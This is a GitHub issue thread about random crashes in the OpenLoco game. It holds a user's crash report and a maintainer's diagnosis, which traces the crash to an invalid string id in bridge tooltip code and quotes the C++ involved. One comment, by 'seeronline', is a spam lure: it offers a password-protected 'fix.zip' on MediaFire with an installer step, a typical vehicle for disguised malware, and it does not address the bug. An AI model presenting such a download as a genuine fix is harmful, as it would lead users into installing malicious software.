### ISSUE TITLE
Random crashes (dump file attached).

### ISSUE THREAD

**Issue by FenderBender2** [OpenLoco/OpenLoco#2604]
**Version information:**
 - Platform: Windows 10
 - Version: 24.08 (also 24.07)
 - Build/commit: 40e9b7bf

**Describe the bug**
My games eem to reach a point where thay start crashing randomly. The latest dump file is attached. In the case of my latest scenario, its when I'm building new elevated railways, and perhaps its when two line cross. This is not restricted to 24.08.

**To Reproduce**
Seems to be random but possibly when I'm creating new reailways.

** Dump File **
[337a22c8-6e5d-4ecd-bd54-425d8e04eb5b(OpenLoco, v24.08 (40e9b7bf on master)).dmp](https://github.com/user-attachments/files/16746484/337a22c8-6e5d-4ecd-bd54-425d8e04eb5b.OpenLoco.v24.08.40e9b7bf.on.master.dmp)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by duncanspumpkin** [comment]
Crashing when trying to create a tooltip for "{SMALLFONT}{COLOUR BLACK}{POP16}{STRINGID}{NEWLINE}Max. speed:  {STRINGID}{NEWLINE}Max. height above ground:  {HEIGHT}"

Issue is the stringid on the stack is invalid 0x45d9 (max normal stringid including objects is 0x246E). We need to add protection to getString to return nullptr when exceeding this but not sure why the stringid is invalid to begin with.

Ahh nevermind i see the source of the problem #2452 sort of caused this.

```cpp
        // THIS IS CORRECT
        auto args = FormatArguments(self.widgets[Common::widx::caption].textArgs);
        if (_trackType & (1 << 7))
        {
            auto roadObj = ObjectManager::get<RoadObject>(_trackType & ~(1 << 7));
            args.push(roadObj->name);
        }
        else
        {
            auto trackObj = ObjectManager::get<TrackObject>(_trackType);
            args.push(trackObj->name);
        }
        // THIS IS NOT CORRECT AS IT NEEDS TO BE MOVED INTO THE TOOLTIP FUNCTION
        if (_lastSelectedBridge != 0xFF)
        {
            auto bridgeObj = ObjectManager::get<BridgeObject>(_lastSelectedBridge);
            if (bridgeObj != nullptr)
            {
                args.push(bridgeObj->name);
                if (bridgeObj->maxSpeed == kSpeed16Null)
                {
                    args.push(StringIds::unlimited_speed);
                    args.push<uint16_t>(0);
                }
                else
                {
                    args.push(StringIds::velocity);
                    args.push(bridgeObj->maxSpeed);
                }
                args.push<uint16_t>(bridgeObj->maxHeight);
            }
        }
```

**Comment by FenderBender2** [comment]
Thanks for spotting that. 👍
